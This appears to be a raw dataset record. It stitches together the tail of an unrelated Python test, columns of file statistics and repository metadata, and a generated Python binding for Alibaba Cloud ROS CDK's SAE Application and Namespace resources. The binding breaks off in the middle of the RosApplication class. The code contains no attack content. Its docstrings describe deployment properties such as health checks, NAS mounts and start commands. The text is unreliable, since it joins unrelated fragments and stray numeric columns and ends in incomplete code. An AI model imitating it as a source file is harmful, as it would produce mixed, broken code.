            "delete-license", "hostname", "admin", "password", "dummy-key"
        )
    assert result == expected
| 35.50497
| 110
| 0.553222
| 1,843
| 17,859
| 5.106348
| 0.064569
| 0.072468
| 0.038253
| 0.036128
| 0.937732
| 0.925938
| 0.918925
| 0.910318
| 0.906705
| 0.900542
| 0
| 0.00366
| 0.326838
| 17,859
| 502
| 111
| 35.575697
| 0.779155
| 0.076656
| 0
| 0.711584
| 0
| 0
| 0.325871
| 0.028153
| 0
| 0
| 0
| 0
| 0.028369
| 1
| 0.030733
| false
| 0.028369
| 0.009456
| 0.002364
| 0.042553
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a6db2d2817bb2866834a8673cd3aa3a1d70a8776
| 113,051
|
py
|
Python
|
multiple-languages/python/ros-cdk-sae-1.0.4/src/ros_cdk_sae/__init__.py
|
piotr-kalanski/Resource-Orchestration-Service-Cloud-Development-Kit
|
2a12deea757ac69e69708dd9fd159fba12cfba0e
|
[
"Apache-2.0"
] | null | null | null |
multiple-languages/python/ros-cdk-sae-1.0.4/src/ros_cdk_sae/__init__.py
|
piotr-kalanski/Resource-Orchestration-Service-Cloud-Development-Kit
|
2a12deea757ac69e69708dd9fd159fba12cfba0e
|
[
"Apache-2.0"
] | null | null | null |
multiple-languages/python/ros-cdk-sae-1.0.4/src/ros_cdk_sae/__init__.py
|
piotr-kalanski/Resource-Orchestration-Service-Cloud-Development-Kit
|
2a12deea757ac69e69708dd9fd159fba12cfba0e
|
[
"Apache-2.0"
] | null | null | null |
'''
## Aliyun ROS SAE Construct Library
This module is part of the AliCloud ROS Cloud Development Kit (ROS CDK) project.
```python
import * as SAE from '@alicloud/ros-cdk-sae';
```
'''
import abc
import builtins
import datetime
import enum
import typing
import jsii
import publication
import typing_extensions
from ._jsii import *
import ros_cdk_core
class Application(
    ros_cdk_core.Resource,
    metaclass=jsii.JSIIMeta,
    jsii_type="@alicloud/ros-cdk-sae.Application",
):
    '''A ROS resource type: ``ALIYUN::SAE::Application``.'''

    def __init__(
        self,
        scope: ros_cdk_core.Construct,
        id: builtins.str,
        props: "ApplicationProps",
        enable_resource_property_constraint: typing.Optional[builtins.bool] = None,
    ) -> None:
        '''Create a new ``ALIYUN::SAE::Application``.

        :param scope: scope in which this resource is defined
        :param id: scoped id of the resource
        :param props: resource properties
        :param enable_resource_property_constraint: -
        '''
        # Hand construction off to the jsii kernel with the positional args.
        constructor_args = [scope, id, props, enable_resource_property_constraint]
        jsii.create(self.__class__, self, constructor_args)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="attrAppId")
    def attr_app_id(self) -> ros_cdk_core.IResolvable:
        '''Attribute AppId: Creating successful application ID.'''
        attr_value = jsii.get(self, "attrAppId")
        return typing.cast(ros_cdk_core.IResolvable, attr_value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="attrChangeOrderId")
    def attr_change_order_id(self) -> ros_cdk_core.IResolvable:
        '''Attribute ChangeOrderId: Return to release a single ID, used to query task execution status.'''
        attr_value = jsii.get(self, "attrChangeOrderId")
        return typing.cast(ros_cdk_core.IResolvable, attr_value)
# Generated jsii data type: keyword-only props bag for ``ALIYUN::SAE::Application``.
# name_mapping translates Python snake_case attribute names to the camelCase
# property names used on the ROS/jsii side.
@jsii.data_type(
    jsii_type="@alicloud/ros-cdk-sae.ApplicationProps",
    jsii_struct_bases=[],
    name_mapping={
        "app_name": "appName",
        "cpu": "cpu",
        "memory": "memory",
        "namespace_id": "namespaceId",
        "package_type": "packageType",
        "replicas": "replicas",
        "app_description": "appDescription",
        "command": "command",
        "command_args": "commandArgs",
        "custom_host_alias": "customHostAlias",
        "deploy": "deploy",
        "edas_container_version": "edasContainerVersion",
        "envs": "envs",
        "image_url": "imageUrl",
        "jar_start_args": "jarStartArgs",
        "jar_start_options": "jarStartOptions",
        "jdk": "jdk",
        "liveness": "liveness",
        "mount_desc": "mountDesc",
        "mount_host": "mountHost",
        "nas_id": "nasId",
        "package_url": "packageUrl",
        "package_version": "packageVersion",
        "post_start": "postStart",
        "pre_stop": "preStop",
        "readiness": "readiness",
        "security_group_id": "securityGroupId",
        "sls_configs": "slsConfigs",
        "tags": "tags",
        "timezone": "timezone",
        "vpc_id": "vpcId",
        "v_switch_id": "vSwitchId",
        "war_start_options": "warStartOptions",
        "web_container": "webContainer",
    },
)
class ApplicationProps:
    def __init__(
        self,
        *,
        app_name: typing.Union[builtins.str, ros_cdk_core.IResolvable],
        cpu: typing.Union[jsii.Number, ros_cdk_core.IResolvable],
        memory: typing.Union[jsii.Number, ros_cdk_core.IResolvable],
        namespace_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
        package_type: typing.Union[builtins.str, ros_cdk_core.IResolvable],
        replicas: typing.Union[jsii.Number, ros_cdk_core.IResolvable],
        app_description: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        command: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        command_args: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        custom_host_alias: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        deploy: typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]] = None,
        edas_container_version: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        envs: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        image_url: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        jar_start_args: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        jar_start_options: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        jdk: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        liveness: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        mount_desc: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        mount_host: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        nas_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        package_url: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        package_version: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        post_start: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        pre_stop: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        readiness: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        security_group_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        sls_configs: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        tags: typing.Optional[typing.Sequence["RosApplication.TagsProperty"]] = None,
        timezone: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        vpc_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        v_switch_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        war_start_options: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        web_container: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    ) -> None:
        '''Properties for defining a ``ALIYUN::SAE::Application``.

        :param app_name: Property appName: Application Name. Allowed numbers, letters and underlined combinations thereof. We must begin with the letters, the maximum length of 36 characters.
        :param cpu: Property cpu: Each instance of the CPU required, in units of milli core, can not be zero. Currently only supports fixed specifications instance type.
        :param memory: Property memory: Each instance of the required memory, in units of MB, can not be zero. Currently only supports fixed specifications instance type.
        :param namespace_id: Property namespaceId: EDAS namespace corresponding to ID. Canada supports only the name of the scribe lowercase namespace must begin with a letter. Namespace can interface to obtain from DescribeNamespaceList.
        :param package_type: Property packageType: Application package type. Support FatJar, War, Image.
        :param replicas: Property replicas: The initial number of instances.
        :param app_description: Property appDescription: Application description. No more than 1024 characters.
        :param command: Property command: Mirroring the start command. The command object in memory executable container must be. For example: sleep. This command will cause the image to set the original startup command failure.
        :param command_args: Property commandArgs: Mirroring the start command parameters. Parameters required for the start-command. For example: [ "1d"]
        :param custom_host_alias: Property customHostAlias: Custom mapping host vessel. For example: [{ "hostName": "samplehost", "ip": "127.0.0.1"}]
        :param deploy: Property deploy: Whether deployed immediately take effect, the default is false.
        :param edas_container_version: Property edasContainerVersion: EDAS pandora runtime environment used by the application.
        :param envs: Property envs: Container environment variable parameters. For example: [{ "name": "envtmp", "value": "0"}]
        :param image_url: Property imageUrl: Mirroring address. Image only type of application can be configured to mirror address.
        :param jar_start_args: Property jarStartArgs: Jar package startup application parameters. Apply the default startup command: $ JAVA_HOME / bin / java $ JarStartOptions -jar $ CATALINA_OPTS "$ package_path" $ JarStartArgs
        :param jar_start_options: Property jarStartOptions: Jar start the application package option. Apply the default startup command: $ JAVA_HOME / bin / java $ JarStartOptions -jar $ CATALINA_OPTS "$ package_path" $ JarStartArgs
        :param jdk: Property jdk: Deployment of JDK version of the package depends on. Mirroring not supported.
        :param liveness: Property liveness: Container health check, health check fails container will be killed and recovery. Currently only supports mode command issued in the container. The columns: { "exec": { "command": [ "sleep", "5s"]}, "initialDelaySeconds": 10, "timeoutSeconds": 11}
        :param mount_desc: Property mountDesc: Mount Description.
        :param mount_host: Property mountHost: nas mount point in the application of vpc.
        :param nas_id: Property nasId: Mount the NAS ID, you must be in the same region and cluster. It must be available to create a mount point limit, or switch on its mount point already in the VPC. If you do not fill, and there mountDescs field, the default will automatically purchase a NAS and mount it onto the switch within the VPC.
        :param package_url: Property packageUrl: Deployment packages address. Only FatJar War or the type of application can be configured to deploy packet address.
        :param package_version: Property packageVersion: The version number of the deployed package, War FatJar type required. Please customize it meaning.
        :param post_start: Property postStart: Executing the script, such as after starting the format: { "exec": { "command": "cat", "/ etc / group"}}.
        :param pre_stop: Property preStop: Script is executed before stopping the format as: { "exec": { "command": "cat", "/ etc / group"}}.
        :param readiness: Property readiness: Application launch status check, health check fails repeatedly container will be killed and restarted. Do not pass health check of the vessel will not have to enter SLB traffic. For example: { "exec": { "command": [ "sleep", "6s"]}, "initialDelaySeconds": 15, "timeoutSeconds": 12}
        :param security_group_id: Property securityGroupId: Security group ID.
        :param sls_configs: Property slsConfigs: Log collection configuration file.
        :param tags: Property tags: Tags to attach to application. Max support 20 tags to add during create application. Each tag with two properties Key and Value, and Key is required.
        :param timezone: Property timezone: Application time zone. Default Asia/Shanghai.
        :param vpc_id: Property vpcId: EDAS namespace corresponding VPC. In Serverless in a corresponding one of the VPC namespace only, and can not be modified. Serverless first created in the application name space will form a binding relationship. You may correspond to a plurality of namespaces VPC. Do not fill was VpcId namespace binding.
        :param v_switch_id: Property vSwitchId: Application examples where the elastic card virtual switch. The switch must be located above the VPC. The same switch with EDAS namespace binding relationship. Do not fill was VSwitchId namespace binding.
        :param war_start_options: Property warStartOptions: War Start the application package option. Apply the default startup command: java $ JAVA_OPTS $ CATALINA_OPTS -Options org.apache.catalina.startup.Bootstrap "$ @" start
        :param web_container: Property webContainer: Tomcat deployment of the package depends on the version. Mirroring not supported.
        '''
        # Required properties are always stored; optional ones are stored only
        # when the caller actually supplied them, so ``_values`` doubles as the
        # "was this set?" record used by the optional getters below.
        self._values: typing.Dict[str, typing.Any] = {
            "app_name": app_name,
            "cpu": cpu,
            "memory": memory,
            "namespace_id": namespace_id,
            "package_type": package_type,
            "replicas": replicas,
        }
        if app_description is not None:
            self._values["app_description"] = app_description
        if command is not None:
            self._values["command"] = command
        if command_args is not None:
            self._values["command_args"] = command_args
        if custom_host_alias is not None:
            self._values["custom_host_alias"] = custom_host_alias
        if deploy is not None:
            self._values["deploy"] = deploy
        if edas_container_version is not None:
            self._values["edas_container_version"] = edas_container_version
        if envs is not None:
            self._values["envs"] = envs
        if image_url is not None:
            self._values["image_url"] = image_url
        if jar_start_args is not None:
            self._values["jar_start_args"] = jar_start_args
        if jar_start_options is not None:
            self._values["jar_start_options"] = jar_start_options
        if jdk is not None:
            self._values["jdk"] = jdk
        if liveness is not None:
            self._values["liveness"] = liveness
        if mount_desc is not None:
            self._values["mount_desc"] = mount_desc
        if mount_host is not None:
            self._values["mount_host"] = mount_host
        if nas_id is not None:
            self._values["nas_id"] = nas_id
        if package_url is not None:
            self._values["package_url"] = package_url
        if package_version is not None:
            self._values["package_version"] = package_version
        if post_start is not None:
            self._values["post_start"] = post_start
        if pre_stop is not None:
            self._values["pre_stop"] = pre_stop
        if readiness is not None:
            self._values["readiness"] = readiness
        if security_group_id is not None:
            self._values["security_group_id"] = security_group_id
        if sls_configs is not None:
            self._values["sls_configs"] = sls_configs
        if tags is not None:
            self._values["tags"] = tags
        if timezone is not None:
            self._values["timezone"] = timezone
        if vpc_id is not None:
            self._values["vpc_id"] = vpc_id
        if v_switch_id is not None:
            self._values["v_switch_id"] = v_switch_id
        if war_start_options is not None:
            self._values["war_start_options"] = war_start_options
        if web_container is not None:
            self._values["web_container"] = web_container

    @builtins.property
    def app_name(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
        '''Property appName: Application Name.

        Allowed numbers, letters and underlined combinations thereof. We must begin with the letters, the maximum length of 36 characters.
        '''
        result = self._values.get("app_name")
        assert result is not None, "Required property 'app_name' is missing"
        return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)

    @builtins.property
    def cpu(self) -> typing.Union[jsii.Number, ros_cdk_core.IResolvable]:
        '''Property cpu: Each instance of the CPU required, in units of milli core, can not be zero.

        Currently only supports fixed specifications instance type.
        '''
        result = self._values.get("cpu")
        assert result is not None, "Required property 'cpu' is missing"
        return typing.cast(typing.Union[jsii.Number, ros_cdk_core.IResolvable], result)

    @builtins.property
    def memory(self) -> typing.Union[jsii.Number, ros_cdk_core.IResolvable]:
        '''Property memory: Each instance of the required memory, in units of MB, can not be zero.

        Currently only supports fixed specifications instance type.
        '''
        result = self._values.get("memory")
        assert result is not None, "Required property 'memory' is missing"
        return typing.cast(typing.Union[jsii.Number, ros_cdk_core.IResolvable], result)

    @builtins.property
    def namespace_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
        '''Property namespaceId: EDAS namespace corresponding to ID.

        Canada supports only the name of the scribe lowercase namespace must begin with a letter.
        Namespace can interface to obtain from DescribeNamespaceList.
        '''
        result = self._values.get("namespace_id")
        assert result is not None, "Required property 'namespace_id' is missing"
        return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)

    @builtins.property
    def package_type(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
        '''Property packageType: Application package type.

        Support FatJar, War, Image.
        '''
        result = self._values.get("package_type")
        assert result is not None, "Required property 'package_type' is missing"
        return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)

    @builtins.property
    def replicas(self) -> typing.Union[jsii.Number, ros_cdk_core.IResolvable]:
        '''Property replicas: The initial number of instances.'''
        result = self._values.get("replicas")
        assert result is not None, "Required property 'replicas' is missing"
        return typing.cast(typing.Union[jsii.Number, ros_cdk_core.IResolvable], result)

    @builtins.property
    def app_description(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property appDescription: Application description.

        No more than 1024 characters.
        '''
        result = self._values.get("app_description")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def command(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property command: Mirroring the start command.

        The command object in memory executable container must be. For example: sleep. This command will cause the image to set the original startup command failure.
        '''
        result = self._values.get("command")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def command_args(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property commandArgs: Mirroring the start command parameters.

        Parameters required for the start-command. For example: [ "1d"]
        '''
        result = self._values.get("command_args")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def custom_host_alias(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property customHostAlias: Custom mapping host vessel.

        For example: [{ "hostName": "samplehost", "ip": "127.0.0.1"}]
        '''
        result = self._values.get("custom_host_alias")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def deploy(
        self,
    ) -> typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]]:
        '''Property deploy: Whether deployed immediately take effect, the default is false.'''
        result = self._values.get("deploy")
        return typing.cast(typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def edas_container_version(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property edasContainerVersion: EDAS pandora runtime environment used by the application.'''
        result = self._values.get("edas_container_version")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def envs(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property envs: Container environment variable parameters.

        For example: [{ "name": "envtmp", "value": "0"}]
        '''
        result = self._values.get("envs")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def image_url(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property imageUrl: Mirroring address.

        Image only type of application can be configured to mirror address.
        '''
        result = self._values.get("image_url")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def jar_start_args(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property jarStartArgs: Jar package startup application parameters.

        Apply the default startup command: $ JAVA_HOME / bin / java $ JarStartOptions -jar $ CATALINA_OPTS "$ package_path"
        $ JarStartArgs
        '''
        result = self._values.get("jar_start_args")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def jar_start_options(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property jarStartOptions: Jar start the application package option.

        Apply the default startup command: $ JAVA_HOME / bin / java $ JarStartOptions -jar $ CATALINA_OPTS "$ package_path"
        $ JarStartArgs
        '''
        result = self._values.get("jar_start_options")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def jdk(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property jdk: Deployment of JDK version of the package depends on.

        Mirroring not supported.
        '''
        result = self._values.get("jdk")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def liveness(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property liveness: Container health check, health check fails container will be killed and recovery.

        Currently only supports mode command issued in the container. The columns: { "exec": { "command": [ "sleep", "5s"]}, "initialDelaySeconds": 10, "timeoutSeconds": 11}
        '''
        result = self._values.get("liveness")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def mount_desc(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property mountDesc: Mount Description.'''
        result = self._values.get("mount_desc")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def mount_host(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property mountHost: nas mount point in the application of vpc.'''
        result = self._values.get("mount_host")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def nas_id(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property nasId: Mount the NAS ID, you must be in the same region and cluster.

        It must be available to create a mount point limit, or switch on its mount point already in the VPC. If you do not fill, and there mountDescs field, the default will automatically purchase a NAS and mount it onto the switch within the VPC.
        '''
        result = self._values.get("nas_id")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def package_url(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property packageUrl: Deployment packages address.

        Only FatJar War or the type of application can be configured to deploy packet address.
        '''
        result = self._values.get("package_url")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def package_version(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property packageVersion: The version number of the deployed package, War FatJar type required.

        Please customize it meaning.
        '''
        result = self._values.get("package_version")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def post_start(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property postStart: Executing the script, such as after starting the format: { "exec": { "command": "cat", "/ etc / group"}}.'''
        result = self._values.get("post_start")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def pre_stop(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property preStop: Script is executed before stopping the format as: { "exec": { "command": "cat", "/ etc / group"}}.'''
        result = self._values.get("pre_stop")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def readiness(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property readiness: Application launch status check, health check fails repeatedly container will be killed and restarted.

        Do not pass health check of the vessel will not have to enter SLB traffic. For example: { "exec": { "command": [ "sleep", "6s"]}, "initialDelaySeconds": 15, "timeoutSeconds": 12}
        '''
        result = self._values.get("readiness")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def security_group_id(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property securityGroupId: Security group ID.'''
        result = self._values.get("security_group_id")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def sls_configs(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property slsConfigs: Log collection configuration file.'''
        result = self._values.get("sls_configs")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def tags(self) -> typing.Optional[typing.List["RosApplication.TagsProperty"]]:
        '''Property tags: Tags to attach to application.

        Max support 20 tags to add during create application. Each tag with two properties Key and Value, and Key is required.
        '''
        result = self._values.get("tags")
        return typing.cast(typing.Optional[typing.List["RosApplication.TagsProperty"]], result)

    @builtins.property
    def timezone(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property timezone: Application time zone.

        Default Asia/Shanghai.
        '''
        result = self._values.get("timezone")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def vpc_id(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property vpcId: EDAS namespace corresponding VPC.

        In Serverless in a corresponding one of the VPC namespace only, and can not be modified. Serverless first created in the application name space will form a binding relationship. You may correspond to a plurality of namespaces VPC. Do not fill was VpcId namespace binding.
        '''
        result = self._values.get("vpc_id")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def v_switch_id(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property vSwitchId: Application examples where the elastic card virtual switch.

        The switch must be located above the VPC. The same switch with EDAS namespace binding relationship. Do not fill was VSwitchId namespace binding.
        '''
        result = self._values.get("v_switch_id")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def war_start_options(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property warStartOptions: War Start the application package option.

        Apply the default startup command: java $ JAVA_OPTS $ CATALINA_OPTS -Options org.apache.catalina.startup.Bootstrap "$ @" start
        '''
        result = self._values.get("war_start_options")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    @builtins.property
    def web_container(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property webContainer: Tomcat deployment of the package depends on the version.

        Mirroring not supported.
        '''
        result = self._values.get("web_container")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

    def __eq__(self, rhs: typing.Any) -> builtins.bool:
        '''Structs compare equal when they hold the same values.'''
        return isinstance(rhs, self.__class__) and rhs._values == self._values

    def __ne__(self, rhs: typing.Any) -> builtins.bool:
        '''Defined explicitly for Python 2-style symmetry with ``__eq__``.'''
        return not (rhs == self)

    def __repr__(self) -> str:
        '''Debug representation listing every stored property.'''
        return "ApplicationProps(%s)" % ", ".join(
            k + "=" + repr(v) for k, v in self._values.items()
        )
class Namespace(
    ros_cdk_core.Resource,
    metaclass=jsii.JSIIMeta,
    jsii_type="@alicloud/ros-cdk-sae.Namespace",
):
    '''A ROS resource type: ``ALIYUN::SAE::Namespace``.'''

    def __init__(
        self,
        scope: ros_cdk_core.Construct,
        id: builtins.str,
        props: "NamespaceProps",
        enable_resource_property_constraint: typing.Optional[builtins.bool] = None,
    ) -> None:
        '''Create a new ``ALIYUN::SAE::Namespace``.

        :param scope: scope in which this resource is defined
        :param id: scoped id of the resource
        :param props: resource properties
        :param enable_resource_property_constraint: -
        '''
        # Hand construction off to the jsii kernel with the positional args.
        constructor_args = [scope, id, props, enable_resource_property_constraint]
        jsii.create(self.__class__, self, constructor_args)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="attrNamespaceId")
    def attr_namespace_id(self) -> ros_cdk_core.IResolvable:
        '''Attribute NamespaceId: Namespace ID.'''
        attr_value = jsii.get(self, "attrNamespaceId")
        return typing.cast(ros_cdk_core.IResolvable, attr_value)
@jsii.data_type(
    jsii_type="@alicloud/ros-cdk-sae.NamespaceProps",
    jsii_struct_bases=[],
    name_mapping={
        "namespace_id": "namespaceId",
        "namespace_name": "namespaceName",
        "namespace_description": "namespaceDescription",
    },
)
class NamespaceProps:
    def __init__(
        self,
        *,
        namespace_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
        namespace_name: typing.Union[builtins.str, ros_cdk_core.IResolvable],
        namespace_description: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    ) -> None:
        '''Properties for defining a ``ALIYUN::SAE::Namespace``.

        :param namespace_id: Property namespaceId: Namespace ID. Format: "regionId:logicalId" or "logicalId"
        :param namespace_name: Property namespaceName: Namespace name.
        :param namespace_description: Property namespaceDescription: Namespace description.
        '''
        # Required values are always recorded; the optional description is
        # stored only when the caller actually supplied one.
        values: typing.Dict[str, typing.Any] = {
            "namespace_id": namespace_id,
            "namespace_name": namespace_name,
        }
        if namespace_description is not None:
            values["namespace_description"] = namespace_description
        self._values = values

    @builtins.property
    def namespace_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
        '''Property namespaceId: Namespace ID.

        Format: "regionId:logicalId" or "logicalId"
        '''
        value = self._values.get("namespace_id")
        assert value is not None, "Required property 'namespace_id' is missing"
        return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], value)

    @builtins.property
    def namespace_name(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
        '''Property namespaceName: Namespace name.'''
        value = self._values.get("namespace_name")
        assert value is not None, "Required property 'namespace_name' is missing"
        return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], value)

    @builtins.property
    def namespace_description(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property namespaceDescription: Namespace description.'''
        # Optional property: absent keys simply yield None.
        value = self._values.get("namespace_description")
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], value)

    def __eq__(self, rhs: typing.Any) -> builtins.bool:
        """Structural equality: same concrete class and identical stored values."""
        if not isinstance(rhs, self.__class__):
            return False
        return rhs._values == self._values

    def __ne__(self, rhs: typing.Any) -> builtins.bool:
        """Inverse of equality (delegates to ``rhs == self``)."""
        equal = rhs == self
        return not equal

    def __repr__(self) -> str:
        """Debug representation listing every configured property."""
        rendered = ", ".join(f"{key}={value!r}" for key, value in self._values.items())
        return "NamespaceProps(%s)" % rendered
class RosApplication(
    ros_cdk_core.RosResource,
    metaclass=jsii.JSIIMeta,
    jsii_type="@alicloud/ros-cdk-sae.RosApplication",
):
    '''A ROS template type: ``ALIYUN::SAE::Application``.'''

    # NOTE(review): generated jsii binding. Member names in @jsii.member(...)
    # and the jsii_type string must match the jsii assembly exactly; do not
    # rename anything here without regenerating from the assembly.

    def __init__(
        self,
